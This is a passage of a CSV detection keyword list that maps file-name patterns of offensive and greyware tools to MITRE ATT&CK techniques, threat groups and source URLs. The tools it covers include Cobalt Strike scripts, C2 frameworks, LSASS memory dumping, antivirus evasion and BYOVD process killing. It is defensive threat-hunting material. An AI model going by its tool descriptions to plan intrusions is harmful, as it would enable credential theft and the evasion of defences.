-*\6.bat,greyware_tool_keyword,_,Suspicious file names - One caracter executables often used by threat actors (warning false positives),T1070.004 - T1059,TA0010 - TA0002,N/A,N/A,Defense Evasion,N/A,1,0,False positive rate can be high,2,10,N/A,N/A,N/A,N/A -*\6.dll,greyware_tool_keyword,_,Suspicious file names - One caracter executables often used by threat actors (warning false positives),T1070.004 - T1059,TA0010 - TA0002,N/A,N/A,Defense Evasion,N/A,1,0,False positive rate can be high,2,10,N/A,N/A,N/A,N/A -*\6.exe,greyware_tool_keyword,_,Suspicious file names - One caracter executables often used by threat actors (warning false positives),T1070.004 - T1059,TA0010 - TA0002,N/A,N/A,Defense Evasion,N/A,1,0,False positive rate can be high,2,10,N/A,N/A,N/A,N/A -*\7.bat,greyware_tool_keyword,_,Suspicious file names - One caracter executables often used by threat actors (warning false positives),T1070.004 - T1059,TA0010 - TA0002,N/A,N/A,Defense Evasion,N/A,1,0,False positive rate can be high,2,10,N/A,N/A,N/A,N/A -*\7.dll,greyware_tool_keyword,_,Suspicious file names - One caracter executables often used by threat actors (warning false positives),T1070.004 - T1059,TA0010 - TA0002,N/A,N/A,Defense Evasion,N/A,1,0,False positive rate can be high,2,10,N/A,N/A,N/A,N/A -*\7.exe,greyware_tool_keyword,_,Suspicious file names - One caracter executables often used by threat actors (warning false positives),T1070.004 - T1059,TA0010 - TA0002,N/A,N/A,Defense Evasion,N/A,1,0,False positive rate can be high,2,10,N/A,N/A,N/A,N/A -*\8.bat,greyware_tool_keyword,_,Suspicious file names - One caracter executables often used by threat actors (warning false positives),T1070.004 - T1059,TA0010 - TA0002,N/A,N/A,Defense Evasion,N/A,1,0,False positive rate can be high,2,10,N/A,N/A,N/A,N/A -*\8.dll,greyware_tool_keyword,_,Suspicious file names - One caracter executables often used by threat actors (warning false positives),T1070.004 - T1059,TA0010 - TA0002,N/A,N/A,Defense Evasion,N/A,1,0,False positive rate can be high,2,10,N/A,N/A,N/A,N/A -*\8.exe,greyware_tool_keyword,_,Suspicious file names - One caracter executables often used by threat actors (warning false positives),T1070.004 - T1059,TA0010 - TA0002,N/A,N/A,Defense Evasion,N/A,1,0,False positive rate can be high,2,10,N/A,N/A,N/A,N/A -*\8e8988b257e9dd2ea44ff03d44d26467b7c9ec16*,offensive_tool_keyword,cobaltstrike,A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/yanghaoi/CobaltStrike_CNA,1,0,N/A,10,10,402,78,2022-01-18T12:47:55Z,2021-04-21T13:10:11Z -*\9.bat,greyware_tool_keyword,_,Suspicious file names - One caracter executables often used by threat actors (warning false positives),T1070.004 - T1059,TA0010 - TA0002,N/A,N/A,Defense Evasion,N/A,1,0,False positive rate can be high,2,10,N/A,N/A,N/A,N/A -*\9.dll,greyware_tool_keyword,_,Suspicious file names - One caracter executables often used by threat actors (warning false positives),T1070.004 - T1059,TA0010 - TA0002,N/A,N/A,Defense Evasion,N/A,1,0,False positive rate can be high,2,10,N/A,N/A,N/A,N/A -*\9.exe,greyware_tool_keyword,_,Suspicious file names - One caracter executables often used by threat actors (warning false positives),T1070.004 - T1059,TA0010 - TA0002,N/A,N/A,Defense Evasion,N/A,1,0,False positive rate can be high,2,10,N/A,N/A,N/A,N/A -*\AbandonedCOMKeys.*,offensive_tool_keyword,AbandonedCOMKeys,Enumerates abandoned COM keys (specifically InprocServer32). Useful for persistence,T1547.011 - T1049 - T1087.002,TA0005 - TA0007 - TA0003,N/A,N/A,Persistence,https://github.com/matterpreter/OffensiveCSharp/tree/master/AbandonedCOMKeys,1,0,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*\ADCSPwn*,offensive_tool_keyword,ADCSPwn,A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service,T1550.002 - T1078.003 - T1110.003,TA0004 - TA0006,N/A,N/A,Privilege Escalation,https://github.com/bats3c/ADCSPwn,1,0,N/A,10,8,749,119,2023-03-20T20:30:40Z,2021-07-30T15:04:41Z -*\ADFSpoof.py*,offensive_tool_keyword,ADFSpoof,A python tool to forge AD FS security tokens.,T1600 - T1600.001 - T1552 - T1552.004,TA0006 - TA0001,N/A,N/A,Sniffing & Spoofing,https://github.com/mandiant/ADFSpoof,1,0,N/A,10,4,300,52,2023-09-21T17:14:52Z,2019-03-20T22:30:58Z -*\ADFSpray*,offensive_tool_keyword,adfspray,Python3 tool to perform password spraying against Microsoft Online service using various methods,T1110.003,TA0006,N/A,N/A,Credential Access,https://github.com/xFreed0m/ADFSpray,1,0,N/A,N/A,1,75,14,2023-03-12T00:21:34Z,2020-04-23T08:56:51Z -*\ADGet.exe*,greyware_tool_keyword,adget,gather valuable informations about the AD environment,T1018 - T1027 - T1046 - T1057 - T1069 - T1087 - T1098 - T1482,TA0001 - TA0002 - TA0003 - TA0007 - TA0011,N/A,N/A,Discovery,https://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*\adm2sys.py*,offensive_tool_keyword,PyExec,This is a very simple privilege escalation technique from admin to System. This is the same technique PSExec uses.,T1134 - T1055 - T1548.002,TA0004 - TA0005 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/OlivierLaflamme/PyExec,1,0,N/A,9,1,10,6,2019-09-11T13:56:04Z,2019-09-11T13:54:15Z -*\admin-panels.txt*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,0,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*\agent_exe.exe*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,0,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*\alan.log*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,0,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*\Alan.v*.zip*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,0,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*\Alcatraz.exe*,offensive_tool_keyword,Alcatraz,x64 binary obfuscator,T1027 - T1140,TA0004 - TA0042,N/A,N/A,Defense Evasion,https://github.com/weak1337/Alcatraz,1,1,N/A,10,10,1345,219,2023-07-14T14:19:01Z,2022-12-21T17:27:56Z -*\All_attack.txt*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,0,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*\Andrew.dmp*,offensive_tool_keyword,AndrewSpecial,AndrewSpecial - dumping lsass memory stealthily,T1003.001 - T1055.001,TA0006 - TA0004,N/A,N/A,Credential Access,https://github.com/hoangprod/AndrewSpecial,1,0,N/A,10,4,370,101,2019-06-02T02:49:28Z,2019-01-18T19:12:09Z -*\Angry IP Scanner.app*,greyware_tool_keyword,ipscan,Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors,T1046 - T1040 - T1018,TA0007 - TA0009,N/A,N/A,Network Exploitation tools,https://github.com/angryip/ipscan,1,0,N/A,7,10,3517,683,2023-09-11T16:36:25Z,2011-06-28T20:58:48Z -*\AntiSandbox.go*,offensive_tool_keyword,goMatrixC2,C2 leveraging Matrix/Element Messaging Platform as Backend to control Implants in goLang.,T1090 - T1027 - T1071,TA0011 - TA0009 - TA0010,N/A,N/A,C2,https://github.com/n1k7l4i/goMatrixC2,1,1,N/A,10,10,0,2,2023-09-11T10:20:41Z,2023-08-31T09:36:38Z -*\AntiSandbox.go*,offensive_tool_keyword,goZulipC2,C2 leveraging Zulip Messaging Platform as Backend.,T1090 - T1090.003 - T1071 - T1071.001,TA0011 - TA0009,N/A,N/A,C2,https://github.com/n1k7l4i/goZulipC2,1,0,N/A,10,10,5,2,2023-08-31T12:06:58Z,2023-08-13T11:04:20Z -*\AoratosWin*,offensive_tool_keyword,AoratosWin,A tool that removes traces of executed applications on Windows OS.,T1070 - T1564,TA0005 - TA0011,N/A,N/A,Defense Evasion,https://github.com/PinoyWH1Z/AoratosWin,1,0,N/A,N/A,2,117,18,2022-09-04T09:15:35Z,2022-09-04T09:04:35Z -*\APCLdr.*,offensive_tool_keyword,APCLdr,APCLdr: Payload Loader With Evasion Features,T1027 - T1055 - T1055.002 - T1055.003 - T1070 - T1070.004 - T1071 - T1106 - T1574.001,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/NUL0x4C/APCLdr,1,1,N/A,N/A,3,285,51,2023-01-22T04:24:33Z,2023-01-21T18:09:36Z -*\Apollo.exe*,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,1,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*\AppData\Local\Microsoft\CLR_*\UsageLogs\*.exe.log*,greyware_tool_keyword,cobaltstrike,If cobaltstrike uses execute-assembly there is a chance that a file will be created in the UsageLogs logs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*\AppData\Local\Temp\Procmon.exe*,greyware_tool_keyword,procmon,Procmon used in user temp folder,T1059.001 - T1036 - T1569.002,TA0002 - TA0006,N/A,N/A,Reconnaissance,N/A,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*\AppData\Local\Temp\Procmon64.exe*,greyware_tool_keyword,procmon,Procmon used in user temp folder,T1059.001 - T1036 - T1569.002,TA0002 - TA0006,N/A,N/A,Reconnaissance,N/A,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*\asm\x64\alter_pe_sections*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,0,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*\asm\x86\alter_pe_sections*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,0,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*\Athena-*.zip*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*\AtomLdr\x64*,offensive_tool_keyword,AtomLdr,A DLL loader with advanced evasive features,T1071.004 - T1574.001 - T1574.002 - T1071.001 - T1055.003 - T1059.003 - T1546.003 - T1574.003 - T1574.004 - T1059.001 - T1569.002,TA0011 - TA0006 - TA0002 - TA0008 - TA0007,N/A,N/A,Exploitation tools,https://github.com/NUL0x4C/AtomLdr,1,0,N/A,N/A,6,543,78,2023-02-26T19:57:09Z,2023-02-26T17:59:26Z -*\attrib.exe* +H *,greyware_tool_keyword,attrib,command aiming to hide a file. It can be performed with attrib.exe on a WINDOWS machine with command option +h ,T1562.001,TA0040 - TA0002,N/A,N/A,Defense Evasion,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*\AutoSmuggle\*.cs*,offensive_tool_keyword,AutoSmuggle,Utility to craft HTML or SVG smuggled files for Red Team engagements,T1027.006 - T1598,TA0005 - TA0043,N/A,N/A,Defense Evasion,https://github.com/surajpkhetani/AutoSmuggle,1,0,N/A,9,2,141,21,2023-09-02T08:09:50Z,2022-03-20T19:02:06Z -*\autotimeline*,offensive_tool_keyword,autotimeliner,Automagically extract forensic timeline from volatile memory dumps.,T1547 - T1057 - T1003,TA0005 - TA0008,N/A,N/A,Forensic Exploitation tools,https://github.com/andreafortuna/autotimeliner,1,1,N/A,N/A,2,119,23,2023-03-17T07:29:34Z,2018-11-12T16:13:32Z -*\avetdbg.txt*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,0,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*\avred.py*,offensive_tool_keyword,avred,Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.,T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/dobin/avred,1,0,N/A,9,2,172,19,2023-09-30T12:28:42Z,2022-05-19T12:12:34Z -*\avred.py*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*\avredweb.py *,offensive_tool_keyword,avred,Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.,T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/dobin/avred,1,0,N/A,9,2,172,19,2023-09-30T12:28:42Z,2022-05-19T12:12:34Z -*\AzureC2Proxy\*,offensive_tool_keyword,AzureC2Relay,AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.,T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001,TA0042 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/Flangvik/AzureC2Relay,1,0,N/A,10,10,198,47,2021-02-15T18:06:38Z,2021-02-14T00:03:52Z -*\AzureC2Relay*,offensive_tool_keyword,AzureC2Relay,AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.,T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001,TA0042 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/Flangvik/AzureC2Relay,1,1,N/A,10,10,198,47,2021-02-15T18:06:38Z,2021-02-14T00:03:52Z -*\AzureHound.ps1*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*\BabelStrike.py*,offensive_tool_keyword,BabelStrike,The purpose of this tool is to normalize and generate possible usernames out of a full names list that may include names written in multiple (non-English) languages. common problem occurring from scraped employee names lists (e.g. from Linkedin),T1078 - T1114,TA0006 - TA0009,N/A,N/A,Credential Access,https://github.com/t3l3machus/BabelStrike,1,0,N/A,1,1,38,13,2023-09-12T13:49:30Z,2023-01-10T07:59:00Z -*\backdoored\*,offensive_tool_keyword,the-backdoor-factory,Patch PE ELF Mach-O binaries with shellcode new version in development*,T1055.002 - T1055.004 - T1059.001,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/secretsquirrel/the-backdoor-factory,1,0,N/A,10,10,3185,809,2023-08-14T02:52:06Z,2013-05-30T01:04:24Z -*\BackupOperatorToDA*,offensive_tool_keyword,BackupOperatorToDA,From an account member of the group Backup Operators to Domain Admin without RDP or WinRM on the Domain Controller,T1078 - T1078.003 - T1021 - T1021.006 - T1112 - T1003.003,TA0005 - TA0001 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/mpgn/BackupOperatorToDA,1,0,N/A,10,4,335,48,2022-10-05T07:29:46Z,2022-02-15T20:51:46Z -*\BadZure*,offensive_tool_keyword,badazure,BadZure orchestrates the setup of Azure Active Directory tenants populating them with diverse entities while also introducing common security misconfigurations to create vulnerable tenants with multiple attack paths,T1583 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation Tools,https://github.com/mvelazc0/BadZure/,1,0,N/A,5,4,302,18,2023-07-27T15:40:41Z,2023-05-05T04:52:21Z -*\basicKitten.exe*,offensive_tool_keyword,KittyStager,KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.,T1021.002 - T1055.012 - T1105,TA0005 - TA0008 - TA0011,N/A,N/A,C2,https://github.com/Enelg52/KittyStager,1,0,N/A,10,10,175,34,2023-06-06T11:38:39Z,2022-10-10T11:31:23Z -*\beacon.exe*,offensive_tool_keyword,cobaltstrike,A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/yanghaoi/CobaltStrike_CNA,1,0,N/A,10,10,402,78,2022-01-18T12:47:55Z,2021-04-21T13:10:11Z -*\BeaconChannel.cs*,offensive_tool_keyword,DoHC2,DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/SpiderLabs/DoHC2,1,0,N/A,10,10,432,99,2020-08-07T12:48:13Z,2018-10-23T19:40:23Z -*\BeaconConnector.cs*,offensive_tool_keyword,DoHC2,DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/SpiderLabs/DoHC2,1,0,N/A,10,10,432,99,2020-08-07T12:48:13Z,2018-10-23T19:40:23Z -*\BesoToken.cpp*,offensive_tool_keyword,BesoToken,A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).,T1134 - T1003.002,TA0004 - TA0006,N/A,N/A,Credential Access,https://github.com/OmriBaso/BesoToken,1,0,N/A,10,1,91,11,2022-11-23T10:45:07Z,2022-11-21T01:07:51Z -*\BesoToken.exe*,offensive_tool_keyword,BesoToken,A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).,T1134 - T1003.002,TA0004 - TA0006,N/A,N/A,Credential Access,https://github.com/OmriBaso/BesoToken,1,0,N/A,10,1,91,11,2022-11-23T10:45:07Z,2022-11-21T01:07:51Z -*\BesoToken.vcxproj*,offensive_tool_keyword,BesoToken,A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).,T1134 - T1003.002,TA0004 - TA0006,N/A,N/A,Credential Access,https://github.com/OmriBaso/BesoToken,1,0,N/A,10,1,91,11,2022-11-23T10:45:07Z,2022-11-21T01:07:51Z -*\bin\cme.exe*,offensive_tool_keyword,crackmapexec,windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*\bin\shepard\*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*\BITB-main*,offensive_tool_keyword,bitb,Browser templates for Browser In The Browser (BITB) attack,T1056.001 - T1134 - T1090,TA0005 - TA0006 - TA0003,N/A,N/A,Sniffing & Spoofing,https://github.com/mrd0x/BITB,1,0,N/A,10,10,2645,463,2023-07-11T04:57:46Z,2022-03-15T16:51:39Z -*\BitTorrent.exe*,greyware_tool_keyword,bittorent,popular BitTorrent client used for downloading files over the BitTorrent network. a peer-to-peer file sharing protocol. Can be used for collection and exfiltration. Not something we want to see installed in a enterprise network,T1193 - T1204 - T1486 - T1048,TA0005 - TA0011 - TA0010 - TA0040,N/A,N/A,Collection - Data Exfiltration,https[://]www[.]bittorrent.com/fr/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*\Blackout.cpp*,offensive_tool_keyword,Blackout,kill anti-malware protected processes using BYOVD,T1055 - T1562.001,TA0005 - TA0004,N/A,N/A,Defense Evasion,https://github.com/ZeroMemoryEx/Blackout,1,0,N/A,N/A,8,740,116,2023-07-21T17:35:09Z,2023-05-25T23:54:21Z -*\Blackout.exe*,offensive_tool_keyword,Blackout,kill anti-malware protected processes using BYOVD,T1055 - T1562.001,TA0005 - TA0004,N/A,N/A,Defense Evasion,https://github.com/ZeroMemoryEx/Blackout,1,0,N/A,N/A,8,740,116,2023-07-21T17:35:09Z,2023-05-25T23:54:21Z -*\Blackout.sln*,offensive_tool_keyword,Blackout,kill anti-malware protected processes using BYOVD,T1055 - T1562.001,TA0005 - TA0004,N/A,N/A,Defense Evasion,https://github.com/ZeroMemoryEx/Blackout,1,0,N/A,N/A,8,740,116,2023-07-21T17:35:09Z,2023-05-25T23:54:21Z -*\Blackout.sys*,offensive_tool_keyword,Blackout,kill anti-malware protected processes using BYOVD,T1055 - T1562.001,TA0005 - TA0004,N/A,N/A,Defense Evasion,https://github.com/ZeroMemoryEx/Blackout,1,0,N/A,N/A,8,740,116,2023-07-21T17:35:09Z,2023-05-25T23:54:21Z -*\Blackout.sys*,offensive_tool_keyword,ThreatCheck,Identifies the bytes that Microsoft Defender / AMSI Consumer flags on,T1059.001 - T1059.005 - T1027.002 - T1070.004,TA0002 - TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/rasta-mouse/ThreatCheck,1,0,N/A,N/A,8,781,86,2023-04-04T03:06:16Z,2020-10-08T11:22:26Z -*\Blackout.vcxproj*,offensive_tool_keyword,Blackout,kill anti-malware protected processes using BYOVD,T1055 - T1562.001,TA0005 - TA0004,N/A,N/A,Defense Evasion,https://github.com/ZeroMemoryEx/Blackout,1,0,N/A,N/A,8,740,116,2023-07-21T17:35:09Z,2023-05-25T23:54:21Z -*\blindeventlog.exe*,offensive_tool_keyword,DarkWidow,Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing,T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140,TA0005 - TA0003 - TA0002 - TA0004,N/A,N/A,Defense Evasion,https://github.com/reveng007/DarkWidow,1,1,N/A,10,3,268,38,2023-08-03T22:37:44Z,2023-07-24T13:59:16Z -*\BloodHound.exe*,offensive_tool_keyword,BloodHound,BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment,T1069 - T1482 - T1018 - T1087 - T1027 - T1046,TA0007 - TA0003 - TA0002 - TA0040 - TA0043,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/BloodHound,1,0,N/A,10,10,8799,1624,2023-10-03T06:49:04Z,2016-04-17T18:36:14Z -*\BloodHoundGui\*.exe*,offensive_tool_keyword,BloodHound,BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment,T1069 - T1482 - T1018 - T1087 - T1027 - T1046,TA0007 - TA0003 - 